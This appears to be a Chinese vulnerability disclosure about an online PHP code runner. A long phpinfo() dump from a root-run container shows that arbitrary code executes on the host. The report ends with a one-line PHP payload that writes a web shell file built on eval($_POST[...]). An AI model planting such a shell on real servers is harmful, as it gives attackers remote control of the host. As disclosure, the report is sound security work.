1998-2015 Zend Technologies with Zend OPcache v7.0.4-dev, Copyright (c) 1999-2015, by Zend Technologies _______________________________________________________________________ConfigurationbcmathBCMath support => enabledDirective => Local Value => Master Valuebcmath.scale => 0 => 0bz2BZip2 Support => EnabledStream Wrapper support => compress.bzip2://Stream Filter support => bzip2.decompress, bzip2.compressBZip2 Version => 1.0.6, 6-Sept-2010calendarCalendar support => enabledCorePHP Version => 5.6.9-0+deb8u1Directive => Local Value => Master Valueallow_url_fopen => On => Onallow_url_include => Off => Offalways_populate_raw_post_data => 0 => 0arg_separator.input => & => &arg_separator.output => & => &asp_tags => Off => Offauto_append_file => no value => no valueauto_globals_jit => On => Onauto_prepend_file => no value => no valuebrowscap => no value => no valuedefault_charset => UTF-8 => UTF-8default_mimetype => text/html => text/htmldisable_classes => no value => no valuedisable_functions => no value => no valuedisplay_errors => Off => Offdisplay_startup_errors => Off => Offdoc_root => no value => no valuedocref_ext => no value => no valuedocref_root => no value => no valueenable_dl => Off => Offenable_post_data_reading => On => Onerror_append_string => no value => no valueerror_log => no value => no valueerror_prepend_string => no value => no valueerror_reporting => 22527 => 22527exit_on_timeout => Off => Offexpose_php => On => Onextension_dir => /usr/lib/php5/20131226 => /usr/lib/php5/20131226file_uploads => On => Onhighlight.comment => <font style="color: #FF8000">#FF8000</font> => <font style="color: #FF8000">#FF8000</font>highlight.default => <font style="color: #0000BB">#0000BB</font> => <font style="color: #0000BB">#0000BB</font>highlight.html => <font style="color: #000000">#000000</font> => <font style="color: #000000">#000000</font>highlight.keyword => <font style="color: #007700">#007700</font> => <font style="color: #007700">#007700</font>highlight.string => <font style="color: #DD0000">#DD0000</font> => <font style="color: #DD0000">#DD0000</font>html_errors => Off => Offignore_repeated_errors => Off => Offignore_repeated_source => Off => Offignore_user_abort => Off => Offimplicit_flush => On => Oninclude_path => .:/usr/share/php:/usr/share/pear => .:/usr/share/php:/usr/share/pearinput_encoding => no value => no valueinternal_encoding => no value => no valuelog_errors => On => Onlog_errors_max_len => 1024 => 1024mail.add_x_header => On => Onmail.force_extra_parameters => no value => no valuemail.log => no value => no valuemax_execution_time => 0 => 0max_file_uploads => 20 => 20max_input_nesting_level => 64 => 64max_input_time => -1 => -1max_input_vars => 1000 => 1000memory_limit => -1 => -1open_basedir => no value => no valueoutput_buffering => 0 => 0output_encoding => no value => no valueoutput_handler => no value => no valuepost_max_size => 8M => 8Mprecision => 14 => 14realpath_cache_size => 16K => 16Krealpath_cache_ttl => 120 => 120register_argc_argv => On => Onreport_memleaks => On => Onreport_zend_debug => Off => Offrequest_order => GP => GPsendmail_from => no value => no valuesendmail_path => /usr/sbin/sendmail -t -i => /usr/sbin/sendmail -t -i serialize_precision => 17 => 17short_open_tag => Off => OffSMTP => localhost => localhostsmtp_port => 25 => 25sql.safe_mode => Off => Offsys_temp_dir => no value => no valuetrack_errors => Off => Offunserialize_callback_func => no value => no valueupload_max_filesize => 2M => 2Mupload_tmp_dir => no value => no valueuser_dir => no value => no valueuser_ini.cache_ttl => 300 => 300user_ini.filename => .user.ini => .user.inivariables_order => GPCS => GPCSxmlrpc_error_number => 0 => 0xmlrpc_errors => Off => Offzend.detect_unicode => On => Onzend.enable_gc => On => Onzend.multibyte => Off => Offzend.script_encoding => no value => no valuectypectype functions => enabledcurlcURL support => enabledcURL Information => 7.38.0Age => 3FeaturesAsynchDNS => YesCharConv => NoDebug => NoGSS-Negotiate => NoIDN => YesIPv6 => Yeskrb4 => NoLargefile => Yeslibz => YesNTLM => YesNTLMWB => YesSPNEGO => YesSSL => YesSSPI => NoTLS-SRP => YesProtocols => dict, file, ftp, ftps, gopher, http, https, imap, imaps, ldap, ldaps, pop3, pop3s, rtmp, rtsp, scp, sftp, smtp, smtps, telnet, tftpHost => x86_64-pc-linux-gnuSSL Version => OpenSSL/1.0.1kZLib Version => 1.2.8libSSH Version => libssh2/1.4.3datedate/time support => enabled"Olson" Timezone Database Version => 0.systemTimezone Database => internalDefault timezone => UTCDirective => Local Value => Master Valuedate.default_latitude => 31.7667 => 31.7667date.default_longitude => 35.2333 => 35.2333date.sunrise_zenith => 90.583333 => 90.583333date.sunset_zenith => 90.583333 => 90.583333date.timezone => no value => no valuedbaDBA support => enabledlibdb header version => Berkeley DB 5.3.28: (September 9, 2013)libdb library version => Berkeley DB 5.3.28: (September 9, 2013)Supported handlers => cdb cdb_make db4 inifile flatfile qdbm Directive => Local Value => Master Valuedba.default_handler => flatfile => flatfiledomDOM/XML => enabledDOM/XML API Version => 20031129libxml Version => 2.9.1HTML Support => enabledXPath Support => enabledXPointer Support => enabledSchema Support => enabledRelaxNG Support => enablederegRegex Library => Bundled library enabledexifEXIF Support => enabledEXIF Version => 1.4 $Id: 5504545b9be3379c5244b371d825eb64659eb5f5 $Supported EXIF Version => 0220Supported filetypes => JPEG,TIFFDirective => Local Value => Master Valueexif.decode_jis_intel => JIS => JISexif.decode_jis_motorola => JIS => JISexif.decode_unicode_intel => UCS-2LE => UCS-2LEexif.decode_unicode_motorola => UCS-2BE => UCS-2BEexif.encode_jis => no value => no valueexif.encode_unicode => ISO-8859-15 => ISO-8859-15fileinfofileinfo support => enabledversion => 1.0.5libmagic => 517filterInput Validation and Filtering => enabledRevision => $Id: 86120bba568c551914a35636ec408f1e7e66af32 $Directive => Local Value => Master Valuefilter.default => unsafe_raw => unsafe_rawfilter.default_flags => no value => no valueftpFTP support => enabledgdGD Support => enabledGD headers Version => 2.1.1-devFreeType Support => enabledFreeType Linkage => with freetypeFreeType Version => 2.5.2GIF Read Support => enabledGIF Create Support => enabledJPEG Support => enabledlibJPEG Version => 6bPNG Support => enabledlibPNG Version => 1.2.50WBMP Support => enabledXPM Support => enabledlibXpm Version => 30411XBM Support => enabledWebP Support => enabledDirective => Local Value => Master Valuegd.jpeg_ignore_warning => 0 => 0gettextGetText Support => enabledhashhash support => enabledHashing Engines => md2 md4 md5 sha1 sha224 sha256 sha384 sha512 ripemd128 ripemd160 ripemd256 ripemd320 whirlpool tiger128,3 tiger160,3 tiger192,3 tiger128,4 tiger160,4 tiger192,4 snefru snefru256 gost gost-crypto adler32 crc32 crc32b fnv132 fnv1a32 fnv164 fnv1a64 joaat haval128,3 haval160,3 haval192,3 haval224,3 haval256,3 haval128,4 haval160,4 haval192,4 haval224,4 haval256,4 haval128,5 haval160,5 haval192,5 haval224,5 haval256,5 iconviconv support => enablediconv implementation => glibciconv library version => 2.19Directive => Local Value => Master Valueiconv.input_encoding => no value => no valueiconv.internal_encoding => no value => no valueiconv.output_encoding => no value => no valueintlInternationalization support => enabledversion => 1.1.0ICU version => 52.1ICU Data version => 52.1Directive => Local Value => Master Valueintl.default_locale => no value => no valueintl.error_level => 0 => 0intl.use_exceptions => 0 => 0jsonjson support => enabledjson version => 1.3.6JSON-C headers version => 0.11.99JSON-C library version => 0.11.99libxmllibXML support => activelibXML Compiled Version => 2.9.1libXML Loaded Version => 20901libXML streams => enabledmbstringMultibyte Support => enabledMultibyte string engine => libmbflHTTP input encoding translation => disabledlibmbfl version => 1.3.2mbstring extension makes use of "streamable kanji code filter and converter", which is distributed under the GNU Lesser General Public License version 2.1.Multibyte (japanese) regex support => enabledMultibyte regex (oniguruma) version => 5.9.5Directive => Local Value => Master Valuembstring.detect_order => no value => no valuembstring.encoding_translation => Off => Offmbstring.func_overload => 0 => 0mbstring.http_input => no value => no valuembstring.http_output => no value => no valuembstring.http_output_conv_mimetypes => ^(text/|application/xhtml\+xml) => ^(text/|application/xhtml\+xml)mbstring.internal_encoding => no value => no valuembstring.language => neutral => neutralmbstring.strict_detection => Off => Offmbstring.substitute_character => no value => no valuemcryptmcrypt support => enabledmcrypt_filter support => enabledVersion => 2.5.8Api No => 20021217Supported ciphers => cast-128 gost rijndael-128 twofish arcfour cast-256 loki97 rijndael-192 saferplus wake blowfish-compat des rijndael-256 serpent xtea blowfish enigma rc2 tripledes Supported modes => cbc cfb ctr ecb ncfb nofb ofb stream Directive => Local Value => Master Valuemcrypt.algorithms_dir => no value => no valuemcrypt.modes_dir => no value => no valuemhashMHASH support => EnabledMHASH API Version => Emulated SupportmysqlMySQL Support => enabledActive Persistent Links => 0Active Links => 0Client API version => 5.5.43MYSQL_MODULE_TYPE => externalMYSQL_SOCKET => /var/run/mysqld/mysqld.sockMYSQL_INCLUDE => -I/usr/include/mysqlMYSQL_LIBS => -L/usr/lib/x86_64-linux-gnu -lmysqlclient_r Directive => Local Value => Master Valuemysql.allow_local_infile => On => Onmysql.allow_persistent => On => Onmysql.connect_timeout => 60 => 60mysql.default_host => no value => no valuemysql.default_password => no value => no valuemysql.default_port => no value => no valuemysql.default_socket => /var/run/mysqld/mysqld.sock => /var/run/mysqld/mysqld.sockmysql.default_user => no value => no valuemysql.max_links => Unlimited => Unlimitedmysql.max_persistent => Unlimited => Unlimitedmysql.trace_mode => Off => OffmysqliMysqlI Support => enabledClient API library version => 5.5.43Active Persistent Links => 0Inactive Persistent Links => 0Active Links => 0Client API header version => 5.5.42MYSQLI_SOCKET => /var/run/mysqld/mysqld.sockDirective => Local Value => Master Valuemysqli.allow_local_infile => On => Onmysqli.allow_persistent => On => Onmysqli.default_host => no value => no valuemysqli.default_port => 3306 => 3306mysqli.default_pw => no value => no valuemysqli.default_socket => /var/run/mysqld/mysqld.sock => /var/run/mysqld/mysqld.sockmysqli.default_user => no value => no valuemysqli.max_links => Unlimited => Unlimitedmysqli.max_persistent => Unlimited => Unlimitedmysqli.reconnect => Off => Offmysqli.rollback_on_cached_plink => Off => OffopensslOpenSSL support => enabledOpenSSL Library Version => OpenSSL 1.0.1k 8 Jan 2015OpenSSL Header Version => OpenSSL 1.0.1k 8 Jan 2015Directive => Local Value => Master Valueopenssl.cafile => no value => no valueopenssl.capath => no value => no valuepcntlpcntl support => enabledpcrePCRE (Perl Compatible Regular Expressions) Support => enabledPCRE Library Version => 8.35 2014-04-04Directive => Local Value => Master Valuepcre.backtrack_limit => 1000000 => 1000000pcre.recursion_limit => 100000 => 100000PDOPDO support => enabledPDO drivers => mysqlpdo_mysqlPDO Driver for MySQL => enabledClient API version => 5.5.43Directive => Local Value => Master Valuepdo_mysql.default_socket => /var/run/mysqld/mysqld.sock => /var/run/mysqld/mysqld.sockPharPhar: PHP Archive support => enabledPhar EXT version => 2.0.2Phar API version => 1.1.1SVN revision => $Id: a861a034647a6e80ebad0851e018adee293647fb $Phar-based phar archives => enabledTar-based phar archives => enabledZIP-based phar archives => enabledgzip compression => enabledbzip2 compression => enabledOpenSSL support => enabledPhar based on pear/PHP_Archive, original concept by Davey Shafik.Phar fully realized by Gregory Beaver and Marcus Boerger.Portions of tar implementation Copyright (c) 2003-2009 Tim Kientzle.Directive => Local Value => Master Valuephar.cache_list => no value => no valuephar.readonly => On => Onphar.require_hash => On => OnposixRevision => $Id: 5d20de77687b7d961b15450873fa23b9e64a136a $readlineReadline Support => enabledReadline library => EditLine wrapperDirective => Local Value => Master Valuecli.pager => no value => no valuecli.prompt => \b \> => \b \> ReflectionReflection => enabledVersion => $Id: eff8bdc65b0beaf8f4ade6f06f848e6d43dfd826 $sessionSession Support => enabledRegistered save handlers => files user Registered serializer handlers => php_serialize php php_binary wddx Directive => Local Value => Master Valuesession.auto_start => Off => Offsession.cache_expire => 180 => 180session.cache_limiter => nocache => nocachesession.cookie_domain => no value => no valuesession.cookie_httponly => Off => Offsession.cookie_lifetime => 0 => 0session.cookie_path => / => /session.cookie_secure => Off => Offsession.entropy_file => /dev/urandom => /dev/urandomsession.entropy_length => 32 => 32session.gc_divisor => 1000 => 1000session.gc_maxlifetime => 1440 => 1440session.gc_probability => 0 => 0session.hash_bits_per_character => 5 => 5session.hash_function => 0 => 0session.name => PHPSESSID => PHPSESSIDsession.referer_check => no value => no valuesession.save_handler => files => filessession.save_path => /var/lib/php5/sessions => /var/lib/php5/sessionssession.serialize_handler => php => phpsession.upload_progress.cleanup => On => Onsession.upload_progress.enabled => On => Onsession.upload_progress.freq => 1% => 1%session.upload_progress.min_freq => 1 => 1session.upload_progress.name => PHP_SESSION_UPLOAD_PROGRESS => PHP_SESSION_UPLOAD_PROGRESSsession.upload_progress.prefix => upload_progress_ => upload_progress_session.use_cookies => On => Onsession.use_only_cookies => On => Onsession.use_strict_mode => Off => Offsession.use_trans_sid => 0 => 0shmopshmop support => enabledSimpleXMLSimplexml support => enabledRevision => $Id: e0de6ee7ef8280a12d77d76f1f971a944cbc8090 $Schema support => enabledsoapSoap Client => enabledSoap Server => enabledDirective => Local Value => Master Valuesoap.wsdl_cache => 1 => 1soap.wsdl_cache_dir => /tmp => /tmpsoap.wsdl_cache_enabled => 1 => 1soap.wsdl_cache_limit => 5 => 5soap.wsdl_cache_ttl => 86400 => 86400socketsSockets Support => enabledSPLSPL support => enabledInterfaces => Countable, OuterIterator, RecursiveIterator, SeekableIterator, SplObserver, SplSubjectClasses => AppendIterator, ArrayIterator, ArrayObject, BadFunctionCallException, BadMethodCallException, CachingIterator, CallbackFilterIterator, DirectoryIterator, DomainException, EmptyIterator, FilesystemIterator, FilterIterator, GlobIterator, InfiniteIterator, InvalidArgumentException, IteratorIterator, LengthException, LimitIterator, LogicException, MultipleIterator, NoRewindIterator, OutOfBoundsException, OutOfRangeException, OverflowException, ParentIterator, RangeException, RecursiveArrayIterator, RecursiveCachingIterator, RecursiveCallbackFilterIterator, RecursiveDirectoryIterator, RecursiveFilterIterator, RecursiveIteratorIterator, RecursiveRegexIterator, RecursiveTreeIterator, RegexIterator, RuntimeException, SplDoublyLinkedList, SplFileInfo, SplFileObject, SplFixedArray, SplHeap, SplMinHeap, SplMaxHeap, SplObjectStorage, SplPriorityQueue, SplQueue, SplStack, SplTempFileObject, UnderflowException, UnexpectedValueExceptionstandardDynamic Library Support => enabledPath to sendmail => /usr/sbin/sendmail -t -i Directive => Local Value => Master Valueassert.active => 1 => 1assert.bail => 0 => 0assert.callback => no value => no valueassert.quiet_eval => 0 => 0assert.warning => 1 => 1auto_detect_line_endings => 0 => 0default_socket_timeout => 60 => 60from => no value => no valueurl_rewriter.tags => a=href,area=href,frame=src,input=src,form=fakeentry => a=href,area=href,frame=src,input=src,form=fakeentryuser_agent => no value => no valuesysvmsgsysvmsg support => enabledRevision => $Id: 1e821e8a0cbb868efec453560ba303e04f3a1db2 $tokenizerTokenizer Support => enabledwddxWDDX Support => enabledWDDX Session Serializer => enabledxmlXML Support => activeXML Namespace Support => activelibxml2 Version => 2.9.1xmlreaderXMLReader => enabledxmlwriterXMLWriter => enabledxslXSL => enabledlibxslt Version => 1.1.28libxslt compiled against libxml Version => 2.9.2EXSLT => enabledlibexslt Version => 1.1.28Zend OPcacheOpcode Caching => DisabledOptimization => DisabledStartup Failed => Opcode Caching is disabled for CLIDirective => Local Value => Master Valueopcache.blacklist_filename => no value => no valueopcache.consistency_checks => 0 => 0opcache.dups_fix => Off => Offopcache.enable => On => Onopcache.enable_cli => Off => Offopcache.enable_file_override => Off => Offopcache.error_log => no value => no valueopcache.fast_shutdown => 0 => 0opcache.file_update_protection => 2 => 2opcache.force_restart_timeout => 180 => 180opcache.inherited_hack => On => Onopcache.interned_strings_buffer => 4 => 4opcache.load_comments => 1 => 1opcache.log_verbosity_level => 1 => 1opcache.max_accelerated_files => 2000 => 2000opcache.max_file_size => 0 => 0opcache.max_wasted_percentage => 5 => 5opcache.memory_consumption => 64 => 64opcache.optimization_level => 0xFFFFFFFF => 0xFFFFFFFFopcache.preferred_memory_model => no value => no valueopcache.protect_memory => 0 => 0opcache.restrict_api => no value => no valueopcache.revalidate_freq => 2 => 2opcache.revalidate_path => Off => Offopcache.save_comments => 1 => 1opcache.use_cwd => On => Onopcache.validate_timestamps => On => OnzipZip => enabledExtension Version => $Id: f9f12af1274212b9f22867472e4aa57eab4bb4cf $Zip version => 1.12.5Libzip version => 0.11.2zlibZLib Support => enabledStream Wrapper => compress.zlib://Stream Filter => zlib.inflate, zlib.deflateCompiled Version => 1.2.8Linked Version => 1.2.8Directive => Local Value => Master Valuezlib.output_compression => Off => Offzlib.output_compression_level => -1 => -1zlib.output_handler => no value => no valueAdditional ModulesModule NamesysvsemsysvshmEnvironmentVariable => ValueHOSTNAME => 95e72a3898edTERM => xtermPATH => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binPWD => /tmp/eff63297-fa4b-4137-9f18-cbaf250dfc63LANG => C.UTF-8SHLVL => 1HOME => /rootOLDPWD => /tmp/dexec/build_ => /usr/bin/phpPHP VariablesVariable => Value_SERVER["HOSTNAME"] => 95e72a3898ed_SERVER["TERM"] => xterm_SERVER["PATH"] => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin_SERVER["PWD"] => /tmp/eff63297-fa4b-4137-9f18-cbaf250dfc63_SERVER["LANG"] => C.UTF-8_SERVER["SHLVL"] => 1_SERVER["HOME"] => /root_SERVER["OLDPWD"] => /tmp/dexec/build_SERVER["_"] => /usr/bin/php_SERVER["PHP_SELF"] => code_SERVER["SCRIPT_NAME"] => code_SERVER["SCRIPT_FILENAME"] => code_SERVER["PATH_TRANSLATED"] => code_SERVER["DOCUMENT_ROOT"] => _SERVER["REQUEST_TIME_FLOAT"] => 1449407212.3096_SERVER["REQUEST_TIME"] => 1449407212_SERVER["argv"] => Array( [0] => code)_SERVER["argc"] => 1PHP LicenseThis program is free software; you can redistribute it and/or modifyit under the terms of the PHP License as published by the PHP Groupand included in the distribution in the file: LICENSEThis program is distributed in the hope that it will be useful,but WITHOUT ANY WARRANTY; without even the implied warranty ofMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.If you did not receive a copy of the PHP license, or have anyquestions about PHP licensing, please contact license@php.net.
并且可以写入文件,无奈水平有限,不知道路径是什么:
<?php $counter_file = 'aa.php';$fopen = fopen($counter_file,'wb');fputs($fopen,'<?php eval($_POST[wooyun])?>');fclose($fopen); ?>
如上
权限设置
未能联系到厂商或者厂商积极拒绝